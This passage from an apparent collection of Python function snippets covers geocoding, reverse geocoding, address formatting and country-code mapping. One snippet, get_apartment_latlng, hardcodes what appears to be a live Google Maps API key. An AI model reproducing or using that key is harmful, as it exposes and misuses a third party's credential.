\"\"\"\n return loc + ', New York, NY 10027'", "def return_address_from_location(location='0,0'):\n if not re.compile('^(\\-?\\d+(\\.\\d+)?),\\s*(\\-?\\d+(\\.\\d+)?)$').match(location):\n raise ValueError('Location Invalid')\n base_url = 'https://maps.googleapis.com/maps/api/geocode/json?'\n latlng = 'latlng=' + location\n try:\n #This try block is for our first 150,000 requests. If we exceed this, use Jack's Token.\n key_string = '&key=' + ACCESS_TOKEN\n url = base_url + latlng + key_string #Builds the url\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n return business_tuple[1]\n else: #otherwise, we just return the address\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n try:\n #Use Jack's Token in case of some invalid request problem with other API Token\n key_string = '&key=' + JACK_TOKEN\n url = base_url + latlng + key_string #Builds the url\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n return business_tuple[1]\n else: #otherwise, we just return the address\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n raise ValueError(\"Something went wrong\")", "def extract_city(full_address):\n full_address = full_address.strip()\n last_comma_index = full_address.rindex(\",\")\n mid_comma_index = full_address.rindex(\",\", 0, last_comma_index)\n city = full_address[mid_comma_index + 1 : last_comma_index]\n city = city.strip()\n return city", "def test_get_country_by_geo_location(self):\n pass", "def geocode(address, key=GOOGLE_KEY):\n\n geo = GoogleV3(key)\n\n try:\n loc = geo.geocode(address, exactly_one=True)\n if loc.raw.get('partial_match'):\n return None\n\n tz = geo.timezone((loc.latitude, loc.longitude))\n tz = tz.localize(datetime.now())\n tz = tz.strftime('%Z')\n\n return {'lng': loc.longitude, 'lat': loc.latitude, 'tz': tz}\n except AttributeError:\n return None\n except:\n raise IOError('error contacting google geocode')", "def geocode(location):\n geocoding_url = f'https://maps.googleapis.com/maps/api/geocode/json?' \\\n f'address={location}&key={_GEOCODING_KEY}'\n geocode_data = requests.get(geocoding_url).json()\n return geocode_data", "def geotransform(street_address_column, borough_column, zip_code_column, in_csv_file_loc, out_csv_file_loc):\r\n with open(out_csv_file_loc, 'wb') as csv_new_file:\r\n fieldnames = ['2010 Census Block',\r\n '2010 Census Block Suffix',\r\n '2010 Census Tract',\r\n 'Assembly District',\r\n 'Atomic Polygon',\r\n 'B10SC First Borough and Street Code',\r\n 'Bike Lane',\r\n 'Borough Block Lot (BBL)',\r\n 'Building Identification Number (BIN) of Input Address or NAP',\r\n 'City Council District',\r\n 'Community District',\r\n 'Community School District',\r\n 'Congressional District',\r\n 'DSNY Snow Priority Code',\r\n 'Election District',\r\n 'First Borough Name',\r\n 'House Number Display Format',\r\n 'House Number Sort Format',\r\n 'Hurricane Evacuation Zone (HEZ)',\r\n 'Message',\r\n 'NTA Name',\r\n 'Neighborhood Tabulation Area (NTA)',\r\n 'Police Precinct',\r\n 'Roadway Type',\r\n 'Second Street Name Normalized',\r\n 'Spatial Coordinates of Segment',\r\n 'State Senatorial District',\r\n 'USPS Preferred City Name',\r\n 'X-Y Coordinates of Lot Centroid',\r\n 'Zip Code',\r\n 'Latitude',\r\n 'Longitude',\r\n 'Spatial X',\r\n 'Spatial Y']\r\n writer = csv.DictWriter(csv_new_file, fieldnames=fieldnames)\r\n writer.writeheader()\r\n \r\n with open(in_csv_file_loc, 'rb') as csvfile:\r\n csvreader = csv.DictReader(csvfile, delimiter = ',')\r\n for row in csvreader:\r\n full_address = row[street_address_column].strip()\r\n split_full_address = full_address.split(' ')\r\n house_number = split_full_address[0]\r\n borough = row[borough_column].strip()\r\n boro_code = borough_transform(borough)\r\n zip_code = row[zip_code_column].strip()\r\n street_name = ' '.join(split_full_address[1:])\r\n \r\n (wa1, wa2) = geo_coder(house_number, boro_code, street_name, zip_code)\r\n \r\n output = Parser(wa1, wa2)\r\n \r\n writer.writerow(output)", "def city_state_zip(**kwargs):\r\n result = \"{city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n # RLID for some reason has two spaces between state & ZIP.\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n return result", "def reverse_lookup(lat, long, key=keys.google):\n result = str(Geocoder(api_key=key).reverse_geocode(lat, long))\n location_details = result.split(\",\")\n address = location_details[0]\n zipcode = location_details[-2][-5:]\n city = location_details[1]\n state = location_details[2].split(\" \")[1]\n return address, zipcode, city, state", "def geocode():\n\n if \"location\" in request.vars:\n location = request.vars.location\n else:\n session.error = T(\"Need to specify a location to search for.\")\n redirect(URL(r=request, f=\"index\"))\n\n if \"service\" in request.vars:\n service = request.vars.service\n else:\n # @ToDo: service=all should be default\n service = \"google\"\n\n if service == \"google\":\n return s3base.GoogleGeocoder(location, db).get_kml()\n\n if service == \"yahoo\":\n return s3base.YahooGeocoder(location, db).get_xml()", "def get_coord_from_address(code_postal, adresse=None):\n headers = {\"Content-Type\": \"application/json\"}\n if adresse != None:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(adresse) + \"&postcode=\" + str(code_postal)))\n else:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(code_postal)))\n print(url)\n r = requests.get(url, headers=headers, data=\"\")\n js = json.loads(r.text)\n if code_postal == 75001:\n x = js['features'][1]['geometry']['coordinates']\n else:\n \tx = js['features'][0]['geometry']['coordinates']\n longitude = x[0]\n latitude = x[1]\n pos = []\n pos.append(longitude)\n pos.append(latitude)\n print(pos)\n return pos", "def get_airport_start_end(result, geo_airport_cities):\n crs={'init': 'epsg:4326'}\n geometry_st = [Point(xy) for xy in zip(result.start_lon, result.start_lat)]\n geometry_end = [Point(xy) for xy in zip(result.end_lon, result.end_lat)]\n geo_st = gpd.GeoDataFrame(geometry_st, crs=crs, geometry=geometry_st)[['geometry']]\n geo_end = gpd.GeoDataFrame(geometry_end, crs=crs, geometry=geometry_end)[['geometry']]\n geo_st.crs = crs\n geo_end.crs = crs\n st_airport = pd.DataFrame(geo_st.within(geo_airport_cities['geometry'].unary_union.buffer(0.1)))\n st_airport.index=result.index\n result['geometry_st'] = st_airport\n end_airport = pd.DataFrame(geo_end.within(geo_airport_cities['geometry'].unary_union.buffer(0.1)))\n end_airport.index=result.index\n result['geometry_end'] = end_airport\n st_florence = pd.DataFrame(geo_st.within(geo_airport_cities['geometry'].loc[1].buffer(0.1)))\n st_florence.index=result.index\n result['geometry_st_fl'] = st_florence\n end_florence = pd.DataFrame(geo_end.within(geo_airport_cities['geometry'].loc[1].buffer(0.1)))\n end_florence.index=result.index\n result['geometry_end_fl'] = end_florence\n st_pisa = pd.DataFrame(geo_st.within(geo_airport_cities['geometry'].loc[0].buffer(0.1)))\n st_pisa.index=result.index\n result['geometry_st_pisa'] = st_pisa\n end_pisa = pd.DataFrame(geo_end.within(geo_airport_cities['geometry'].loc[0].buffer(0.1)))\n end_pisa.index=result.index\n result['geometry_end_pisa'] = end_pisa\n return result", "def suggestions(self, input, borough_code=None):\n parsed = parser.address(input)\n if borough_code:\n parsed['BOROUGH_CODE'] = borough_code\n self.similiar_names = []\n self.results = []\n if parsed['PHN'] and parsed['STREET']:\n if not parsed['BOROUGH_CODE'] and not parsed['ZIP']:\n # iterate borocodes\n for x in range(1, 6):\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=x)\n # try address with borough code if present\n elif parsed['BOROUGH_CODE']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=parsed['BOROUGH_CODE'])\n # try address with zip code if present\n elif parsed['ZIP']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], zip=parsed['ZIP'])\n # validate and retrieve any addresses\n if len(self.similiar_names):\n for name in self.similiar_names:\n self._geocode(phn=parsed['PHN'], street=name['street'], borough_code=name['borough_code'])\n if None in self.results:\n self.results = list(filter(lambda v: v is not None, self.results))\n\n return self.results", "def transform(self):\n print(\"Add City, State\")\n geocoder_prefix_url = self.config_dict.get('geocoder_prefix_url')\n geocoder_suffix_url = self.config_dict.get('geocoder_suffix_url')\n transformed_file = open(f\"{self.config_dict.get('proj_dir')}new_addresses.csv\", \"w\")\n transformed_file.write(\"X,Y,Type\\n\")\n with open(f\"{self.config_dict.get('proj_dir')}addresses.csv\", \"r\") as partial_file:\n csv_dict = csv.DictReader(partial_file, delimiter=',')\n for row in csv_dict:\n address = row[\"Street Address\"] + \" Boulder CO\"\n print(address)\n geocode_url = f\"{geocoder_prefix_url}{address}{geocoder_suffix_url}\"\n print(geocode_url)\n r = requests.get(geocode_url)\n\n resp_dist = r.json()\n x = resp_dist['result']['addressMatches'][0]['coordinates']['x']\n y = resp_dist['result']['addressMatches'][0]['coordinates']['y']\n transformed_file.write(f\"{x},{y}, Residential\\n\")\n\n transformed_file.close()", "def get_countries_geo_df() -> geopandas.GeoDataFrame:\n\n geo_df: geopandas.GeoDataFrame = geopandas.read_file(\n GEO_DATA_DIR / \"ne_110m_admin_0_map_units\" / \"ne_110m_admin_0_map_units.shp\"\n )\n\n geo_df = geo_df.rename(columns={\"ADMIN\": CODE}, errors=\"raise\")\n\n # Keys are what's in the geo df, values are what we want to rename them to\n # Values must match the names in the original data source. If you don't like those\n # names, change them there and then come back and change the values here.\n geo_df[CODE] = (\n geo_df[CODE]\n .map(\n {\n \"Central African Republic\": \"Central African Rep.\",\n \"Democratic Republic of the Congo\": \"Dem. Rep. Congo\",\n \"Equatorial Guinea\": \"Eq. Guinea\",\n \"eSwatini\": \"Eswatini\",\n \"Georgia (Country)\": \"Georgia\",\n \"Republic of Serbia\": \"Serbia\",\n \"United Arab Emirates\": \"UAE\",\n \"United Kingdom\": \"Britain\",\n \"United Republic of Tanzania\": \"Tanzania\",\n \"Western Sahara\": \"W. Sahara\",\n \"United States of America\": \"United States\",\n }\n )\n .fillna(geo_df[CODE])\n )\n geo_df = geo_df[geo_df[CODE] != \"Antarctica\"]\n\n colonial_power_main_countries = {\n \"Britain\": \"England\",\n \"France\": \"France, Metropolitan\",\n \"Norway\": \"Norway\",\n \"Papua New Guinea\": \"Papua New Guinea\",\n }\n\n is_main_country_idx = geo_df[CODE].map(colonial_power_main_countries).isna() | (\n geo_df[\"NAME_SORT\"] == geo_df[CODE].map(colonial_power_main_countries)\n )\n\n geo_df[CODE] = geo_df[CODE].where(\n is_main_country_idx, geo_df[CODE].str.cat(geo_df[\"NAME_SORT\"], sep=\" - \"),\n )\n geo_df[\"name\"] = geo_df[CODE]\n\n geo_df = geo_df[\n [\n \"featurecla\",\n \"scalerank\",\n \"LABELRANK\",\n # \"SOVEREIGNT\",\n # \"SOV_A3\",\n # \"ADM0_DIF\",\n \"LEVEL\",\n # \"TYPE\",\n CODE,\n \"name\",\n # \"ADM0_A3\",\n # \"GEOU_DIF\",\n # \"GEOUNIT\",\n # \"GU_A3\",\n # \"SU_DIF\",\n # \"SUBUNIT\",\n # \"SU_A3\",\n # \"BRK_DIFF\",\n # \"NAME\",\n # \"NAME_LONG\",\n # \"BRK_A3\",\n # \"BRK_NAME\",\n # \"BRK_GROUP\",\n \"ABBREV\",\n # \"POSTAL\",\n # \"FORMAL_EN\",\n # \"FORMAL_FR\",\n # \"NAME_CIAWF\",\n # \"NOTE_ADM0\",\n # \"NOTE_BRK\",\n \"NAME_SORT\",\n # \"NAME_ALT\",\n # \"MAPCOLOR7\",\n # \"MAPCOLOR8\",\n # \"MAPCOLOR9\",\n # \"MAPCOLOR13\",\n # \"POP_EST\",\n # \"POP_RANK\",\n # \"GDP_MD_EST\",\n # \"POP_YEAR\",\n # \"LASTCENSUS\",\n # \"GDP_YEAR\",\n \"ECONOMY\",\n \"INCOME_GRP\",\n # \"WIKIPEDIA\",\n # \"FIPS_10_\",\n # \"ISO_A2\",\n # \"ISO_A3\",\n # \"ISO_A3_EH\",\n # \"ISO_N3\",\n # \"UN_A3\",\n # \"WB_A2\",\n # \"WB_A3\",\n # \"WOE_ID\",\n # \"WOE_ID_EH\",\n # \"WOE_NOTE\",\n # \"ADM0_A3_IS\",\n # \"ADM0_A3_US\",\n # \"ADM0_A3_UN\",\n # \"ADM0_A3_WB\",\n \"CONTINENT\",\n \"REGION_UN\",\n \"SUBREGION\",\n \"REGION_WB\",\n # \"NAME_LEN\",\n # \"LONG_LEN\",\n # \"ABBREV_LEN\",\n # \"TINY\",\n # \"HOMEPART\",\n # \"MIN_ZOOM\",\n # \"MIN_LABEL\",\n # \"MAX_LABEL\",\n # \"NE_ID\",\n # \"WIKIDATAID\",\n # \"NAME_AR\",\n # \"NAME_BN\",\n # \"NAME_DE\",\n # \"NAME_EN\",\n # \"NAME_ES\",\n # \"NAME_FR\",\n # \"NAME_EL\",\n # \"NAME_HI\",\n # \"NAME_HU\",\n # \"NAME_ID\",\n # \"NAME_IT\",\n # \"NAME_JA\",\n # \"NAME_KO\",\n # \"NAME_NL\",\n # \"NAME_PL\",\n # \"NAME_PT\",\n # \"NAME_RU\",\n # \"NAME_SV\",\n # \"NAME_TR\",\n # \"NAME_VI\",\n # \"NAME_ZH\",\n \"geometry\",\n ]\n ]\n\n return geo_df", "def city_country(city, country):\n full_city = city + \", \" + country\n return full_city.title()", "def placeToRoad(placeName):\n # sleep(2)\n g = gmaps.geocode(placeName)\n roadNo, roadName = '', ''\n zipCode, coor_Lat, coor_Lng = None, None, None\n if len(g) > 0:\n for ac in g[0]['address_components']:\n if ac['types'] and len(ac['types']) > 0:\n if ac['types'][0] == 'street_number':\n try:\n roadNo = ac['long_name']\n except:\n roadNo = ''\n if ac['types'][0] == 'route':\n try:\n roadName = ac['long_name']\n except:\n roadName = ''\n if ac['types'][0] == 'postal_code':\n try:\n zipCode = ac['long_name']\n except:\n zipCode = None\n\n # if 'long_name' in g[0]['address_components'][0].keys(): # road no.\n # if g[0]['address_components'][0]['types'][0] == 'street_number':\n # try:\n # roadNo = g[0]['address_components'][0]['long_name']\n # except:\n # roadNo = ''\n #\n # if 'long_name' in g[0]['address_components'][1].keys(): # road name\n # if g[0]['address_components'][1]['types'][0] == 'route':\n # try:\n # roadName = g[0]['address_components'][1]['long_name']\n # except:\n # roadName = ''\n #\n # if 'long_name' in g[0]['address_components'][-1].keys(): # zip code\n # if g[0]['address_components'][-1]['types'][0] == 'postal_code':\n # try:\n # zipCode = g[0]['address_components'][-1]['long_name']\n # except:\n # zipCode = None\n\n if 'location' in g[0]['geometry'].keys():\n try:\n coor = g[0]['geometry']['location'] # APPROXIMATE location\n coor_Lat = coor['lat']\n coor_Lng = coor['lng']\n except:\n coor_Lat, coor_Lng = None, None\n\n roadName = roadNo + ' ' + roadName\n coor = (coor_Lat, coor_Lng)\n return roadName, zipCode, coor", "def get_geocode(self, address):\n\n try:\n raw_data = self.__get_raw_data(address)\n except (URLError, ValueError):\n return 503, None\n else:\n code, coords = self.__parse_raw_data(raw_data)\n return code, coords", "def country_code_update(df):\n from pycountry import countries as ct\n new_df = country_grouping(df)\n # country names in the data set that are not fit ISO standard\n completion = pd.DataFrame(np.array([['Bolivia', 'BO'],\n ['Brunei', 'BN'],\n ['Congo (Brazzaville)', 'CG'],\n ['Congo (Kinshasa)', 'CD'],\n ['Cote d\\'Ivoire', 'CI'],\n ['Holy See', 'VA'],\n ['Iran', 'IR'],\n ['Korea, South', 'KR'],\n ['Moldova', 'MD'],\n ['Russia', 'RU'],\n ['Taiwan*', 'TW'],\n ['Tanzania', 'TZ'],\n ['US', 'US'],\n ['Venezuela', 'VE'],\n ['Vietnam', 'VN'],\n ['Syria', 'SY'],\n ['Laos', 'LA'],\n ['West Bank and Gaza', 'PS'],\n ['Kosovo', 'XK'],\n ['Burma', 'MM']\n ]),\n columns=['c_name', 'c_code']\n )\n country_code_list = []\n for country_name in new_df['Country/Region']:\n try:\n if country_name in completion['c_name'].tolist():\n # print('exception covered: ', country_name)\n country_code = completion['c_code'].loc[completion['c_name'] == country_name].item()\n # identifies the cruise ships in the data set considered as a 'country'\n elif country_name == 'Diamond Princess' or country_name == 'MS Zaandam':\n country_code = 'Cruise Ship'\n else:\n country_code = ct.get(name=country_name).alpha_2\n except KeyError:\n print('no result: ', country_name)\n country_code = 'None'\n pass\n country_code_list.append(country_code)\n # print(country_code_list)\n new_df.insert(0, \"country_code\", country_code_list, True)\n new_df = new_df.drop(columns='Country/Region')\n unknown_index = new_df[new_df['country_code'] == 'Cruise Ship'].index\n new_df.drop(unknown_index, inplace=True) # drop when country_code = 'None', most likely are Cruise ships\n # new_df.set_index(new_df['country_code'])\n return new_df", "def get_location(coordinates):\n location_info = gmaps.reverse_geocode(latlng=coordinates)\n location_list = list()\n for location in location_info:\n if \"locality\" in location[\"types\"]:\n return location[\"formatted_address\"]\n # location_list.append(location[\"formatted_address\"])\n # return location_list", "def _geocode(self, address):\n try:\n g = self.geocoder_class()\n address = smart_str(address)\n result = g.geocode(address, exactly_one=False)\n if result:\n return result[0]\n else:\n raise GeocodeFailed()\n except (UnboundLocalError, ValueError, GeocoderServiceError) as e:\n raise Exception(e)", "def get_coordinates(table, replace_columns=False, remove_nans=False):\n assert \"zip code\" in table.labels or ((\"city\" in table.labels or \"county\" in table.labels) and \"state\" in table.labels)\n ref = Table.read_table(pkg_resources.resource_filename(__name__, \"geodata/geocode_states.csv\"))\n\n index_name = \"\".join(table.labels) # Ensures that index can't possibly be one of the preexisting columns\n index_name += \" \"\n \n table = table.with_columns(index_name, np.arange(table.num_rows))\n lat = np.array([np.nan] * table.num_rows)\n lon = np.array([np.nan] * table.num_rows)\n unassigned = set(range(table.num_rows)) \n while len(unassigned) > 0:\n index = unassigned.pop()\n row = table.take(index).take(0)\n if \"zip code\" in table.labels:\n select = table.where(\"zip code\", row[\"zip code\"][0]).column(index_name)\n unassigned -= set(select)\n try:\n ref_lat, ref_lon = ref.where(\"zip\", int(row[\"zip code\"][0])).select(\"lat\", \"lon\").row(0)\n lat[select] = ref_lat\n lon[select] = ref_lon\n except IndexError:\n pass\n else:\n state_select = table.where(\"state\", row[\"state\"][0]).column(index_name)\n county_select = table.where(\"county\", row[\"county\"][0]).column(index_name) if \"county\" in table.labels else np.arange(table.num_rows)\n city_select = table.where(\"city\", row[\"city\"][0]).column(index_name) if \"city\" in table.labels else np.arange(table.num_rows)\n select = set.intersection(set(state_select), set(county_select), set(city_select))\n unassigned -= select\n select = list(select)\n try:\n matched_ref = ref.where(\"state\", row[\"state\"][0])\n if \"county\" in table.labels:\n matched_ref = matched_ref.where(\"county\", row[\"county\"][0].lower())\n if \"city\" in table.labels:\n matched_ref = matched_ref.where(\"city\", row[\"city\"][0].lower())\n ref_lat, ref_lon = matched_ref.select(\"lat\", \"lon\").row(0)\n lat[select] = ref_lat\n lon[select] = ref_lon\n except IndexError:\n pass\n table = table.with_columns(\"lat\", lat, \"lon\", lon)\n table = table.drop(index_name)\n if replace_columns:\n for label in [\"county\", \"city\", \"zip code\", \"state\"]:\n try:\n table = table.drop(label)\n except KeyError:\n pass\n if remove_nans: \n table = table.where(\"lat\", are.below(float(\"inf\"))) # NaNs are not considered to be smaller than infinity\n return table", "def lookup(addr, num, street, city, code, geo_dict, failure_set):\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.load(req.urlopen(address_url).decode('utf-8'))['result']\n except Exception:\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.loads(req.urlopen(address_url).read().decode('utf-8'))['result']\n except Exception as e:\n print(e, addr)\n failure_set.add(addr)\n return None\n if len(geo_data['addressMatches']) == 0:\n print(addr, ': Failure')\n failure_set.add(addr)\n return None\n print(addr, ': Success')\n location = geo_data['addressMatches'][0]['coordinates']\n latlong = ','.join([str(location['y']), str(location['x'])])\n geo_dict[addr] = latlong\n return tuple(float(geo) for geo in latlong.split(','))", "def get_apartment_latlng(self, soup, apartment_dict):\n import googlemaps\n from datetime import datetime\n\n gmaps = googlemaps.Client(key='AIzaSyBxV4EAXU1aMLGU9bnokygGL92c2BxDzCE')\n\n # Geocoding an address\n geocode_result = gmaps.geocode(apartment_dict['address'])\n\n if len(geocode_result) > 0:\n # Store lat and lng\n apartment_dict['lat'] = geocode_result[0]['geometry']['location']['lat']\n apartment_dict['lng'] = geocode_result[0]['geometry']['location']['lng']\n else:\n print(\"Failed to find lat and lng values\")", "def city_country(city, country):\n return city.title() + \", \" + country.title()", "def city_country(city, country):\n place = f\"{city}, {country}\"\n return place.title()", "def city_country(city_name, country_name):\n city_country_combo = city_name + ', ' + country_name\n return city_country_combo.title()", "def reverse_geocoding(lat, lng, API_KEY=API_KEY, GEOCODE_API_URL=GEOCODE_API_URL):\n params = {\n 'latlng': '{},{}'.format(lat, lng),\n 'key': API_KEY\n }\n\n # Do the request and get the response data\n response = requests.get(GEOCODE_API_URL, params=params)\n response = response.json()\n geodata = parse_response(response)\n return geodata", "def _derive_country_IE(place):\n derived = []\n if _COUNTY_REGEX.search(place.name):\n stripped = _COUNTY_REGEX.sub(\"\", place.name.lower())\n derived += [\"co \" + stripped, \"county \" + stripped]\n\n #\n # Alternative name cases that aren't as straightforward as the above.\n #\n try:\n derived += {\n \"loch garman\": [\"co wexford\"],\n \"uíbh fhailí\": [\"co offaly\"],\n \"maigh eo\": [\"co mayo\"],\n \"an iarmhí\": [\"co westmeath\"],\n }[place.name.lower()]\n except KeyError:\n pass\n\n return [DerivedName(text, \"en\") for text in derived]", "def shiftGeocodesUp(geocode_geounitNode):\n geounitNode = geocode_geounitNode[1]\n geounitNode.geocode = geounitNode.parentGeocode\n geounitNode.setParentGeocode()\n geounitNode.setGeolevel()\n return geounitNode", "def Get_LonghurstProvinceName4Num(input):\n LonghurstProvinceDict = {\n 'ALSK': 'AlaskaDownwellingCoastalProvince',\n 'ANTA': 'AntarcticProvince',\n 'APLR': 'AustralPolarProvince',\n 'ARAB': 'NWArabianUpwellingProvince',\n 'ARCH': 'ArchipelagicDeepBasinsProvince',\n 'ARCT': 'AtlanticArcticProvince',\n 'AUSE': 'EastAustralianCoastalProvince',\n 'AUSW': 'AustraliaIndonesiaCoastalProvince',\n 'BENG': 'BenguelaCurrentCoastalProvince',\n 'BERS': 'N.PacificEpicontinentalProvince',\n 'BPLR': 'BorealPolarProvince(POLR)',\n 'BRAZ': 'BrazilCurrentCoastalProvince',\n 'CAMR': 'CentralAmericanCoastalProvince',\n 'CARB': 'CaribbeanProvince',\n 'CCAL': 'CaliforniaUpwellingCoastalProvince',\n 'CHIL': 'ChilePeruCurrentCoastalProvince',\n 'CHIN': 'ChinaSeaCoastalProvince',\n 'CHSB': 'CheasapeakeBayProvince',\n 'CNRY': 'CanaryCoastalProvince(EACB)',\n 'EAFR': 'E.AfricaCoastalProvince',\n 'ETRA': 'EasternTropicalAtlanticProvince',\n 'FKLD': 'SWAtlanticShelvesProvince',\n 'GFST': 'GulfStreamProvince',\n 'GUIA': 'GuianasCoastalProvince',\n 'GUIN': 'GuineaCurrentCoastalProvince',\n 'INDE': 'E.IndiaCoastalProvince',\n 'INDW': 'W.IndiaCoastalProvince',\n 'ISSG': 'IndianS.SubtropicalGyreProvince',\n 'KURO': 'KuroshioCurrentProvince',\n 'LAKE': 'CaspianSea,AralSea',\n 'MEDI': 'MediterraneanSea,BlackSeaProvince',\n 'MONS': 'IndianMonsoonGyresProvince',\n 'NADR': 'N.AtlanticDriftProvince(WWDR)',\n 'NASE': 'N.AtlanticSubtropicalGyralProvince(East)(STGE)',\n 'NASW': 'N.AtlanticSubtropicalGyralProvince(West)(STGW)',\n 'NATR': 'N.AtlanticTropicalGyralProvince(TRPG)',\n 'NECS': 'NEAtlanticShelvesProvince',\n 'NEWZ': 'NewZealandCoastalProvince',\n 'NPPF': 'N.PacificPolarFrontProvince',\n 'NPSE': 'N.PacificSubtropicalGyreProvince(East)',\n 'NPSW': 'N.PacificSubtropicalGyreProvince(West)',\n 'NPTG': 'N.PacificTropicalGyreProvince',\n 'NWCS': 'NWAtlanticShelvesProvince',\n 'OCAL': 'OffshoreCaliforniaCurrentProvince',\n 'PEQD': 'PacificEquatorialDivergenceProvince',\n 'PNEC': 'N.PacificEquatorialCountercurrentProvince',\n 'PSAE': 'PacificSubarcticGyresProvince(East)',\n 'PSAW': 'PacificSubarcticGyresProvince(West)',\n 'REDS': 'RedSea,PersianGulfProvince',\n 'SANT': 'SubantarcticProvince',\n 'SARC': 'AtlanticSubarcticProvince',\n 'SATL': 'SouthAtlanticGyralProvince(SATG)',\n 'SPSG': 'S.PacificSubtropicalGyreProvince',\n 'SSTC': 'S.SubtropicalConvergenceProvince',\n 'SUND': 'SundaArafuraShelvesProvince',\n 'TASM': 'TasmanSeaProvince',\n 'WARM': 'W.PacificWarmPoolProvince',\n 'WTRA': 'WesternTropicalAtlanticProvince'\n }\n return LonghurstProvinceDict[input]", "def get_lat_lon_from_arcGIS(cities, nworkers=20):\n print(\"get city lat and long from arcGIS\")\n # if len(cities) > 1000:\n # raise Exception(\n # \"Can only fetch up to 1000 lat/long per day from arcGIS\")\n nominatum = Nominatim()\n\n @retry(5)\n def geocoder(nominatum, city):\n notfound = {\n 'City, State/Country': city, 'latitude': None, 'longitude': None}\n loc = nominatum.geocode(city)\n if not loc:\n print(\"SKIPPING %s due to %s\" % (city, \"it being unrecognized\"))\n return notfound\n elif isinstance(loc, Exception):\n print(\"SKIPPING %s due to %s\" % (city, loc))\n return notfound\n else:\n return {'City, State/Country': city,\n 'latitude': loc[1][0],\n 'longitude': loc[1][1]}\n\n _lat_lon = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=nworkers) as executor:\n for city in cities:\n executor\\\n .submit(geocoder, nominatum, city)\\\n .add_done_callback(receives_future(False)(_lat_lon.append))\n\n lat_lon = pd.DataFrame(_lat_lon)\n return lat_lon", "def city_country(city, country):\n return(city.title() + \", \" + country.title())", "def fix_location(r):\n \n # all is fine: just change zipcode datatype to str\n if not np.isnan(r['zip']) and not np.isnan(r['lat']):\n return [str(int(r['zip'])), r['lng'], r['lat']]\n \n # try to locate within zipcode polygons\n if not np.isnan(r['lat']):\n query = \"\"\"\n SELECT t.geoid as zip, {} as lng, {} as lat\n FROM us_zcta5 t JOIN usps_zcta5 z ON t.geoid = z.zip\n WHERE ST_Contains(t.shape, ST_GeomFromText('POINT({} {})', 2))\n \"\"\"\n res = pd.read_sql(query.format(r['lng'], r['lat'], r['lng'], r['lat']), con = con)\n if len(res) == 1:\n return res.values[0].tolist()\n\n # use zipcode center as location proxy: geocoding is prefered in this case, but might be quite expensive\n if not np.isnan(r['zip']):\n res = zipcodes[zipcodes['zip'] == str(int(r['zip']))]\n if len(res) == 1:\n return res.values[0].tolist()[:3]\n\n return [None, None, None]", "def search(self):\n return self.key.geocode(self.cleanplace)", "def ad_rep_city_state(obj):\n return '%s, %s' % (obj.ad_rep.geolocation_object.us_city.name,\n obj.ad_rep.geolocation_object.us_state.abbreviation)", "def regeocodeZipLevelPts(overwrite=False):\n\n\tif exists(regeo_qcew) and not overwrite:\n\t\tprint '\\nthis year\\'s qcew has already been regecoded, if you wish'\n\t\tprint 'to overwrite the existing file use the \"overwrite\" flag\\n'\n\t\treturn\n\n\tmanagement.CopyFeatures(qcew_2913, regeo_qcew)\n\tmanual_geos = retrieveManualGeocodes()\n\n\tregeo, manual = 0, 0\n\twith da.UpdateCursor(regeo_qcew, '*') as cursor:\n\t\tfor row in cursor:\n\t\t\td = OrderedDict(zip(cursor.fields, row))\n\n\t\t\tif int(d['PRECISION_']) > 250:\n\t\t\t\taddr_str = '{0}, {1}, {2}, {3}'.format(\n\t\t\t\t\td['STREET'], d['CITY'], d['ST'], d['ZIP'])\n\n\t\t\t\trsp = geocode(addr_str)\n\t\t\t\tif isinstance(rsp, int):\n\t\t\t\t\tprint 'there seems to a problem in connecting with'\n\t\t\t\t\tprint 'the rlis api halting geoprocessing until this'\n\t\t\t\t\tprint 'is resolved'\n\t\t\t\t\texit()\n\t\t\t\telif rsp:\n\t\t\t\t\t# assign now geometry to row\n\t\t\t\t\td['Shape'] = (rsp['ORSP_x'], rsp['ORSP_y'])\n\n\t\t\t\t\t# update geocoding attributes\n\t\t\t\t\td['DESC_'] = rsp['locator']\n\t\t\t\t\td['PRECISION_'] = 10\n\t\t\t\t\td['GISDATA'] = 'RLIS API Geocoder'\n\t\t\t\t\td['GSCR'] = rsp['score']\n\t\t\t\t\td['Match_TYPE'] = 'A'\n\t\t\t\t\td['POINT_X'] = rsp['ORSP_x']\n\t\t\t\t\td['POINT_Y'] = rsp['ORSP_y']\n\t\t\t\t\tregeo+=1\n\n\t\t\t\telif d['BIN'] in manual_geos:\n\t\t\t\t\tmg_dict = manual_geos[d['BIN']]\n\t\t\t\t\tcoords = mg_dict['Shape']\n\t\t\t\t\t\n\t\t\t\t\td['Shape'] = coords\n\t\t\t\t\td['DESC_'] = mg_dict['Loc_name']\n\t\t\t\t\td['PRECISION_'] = 10\n\t\t\t\t\td['GISDATA'] = 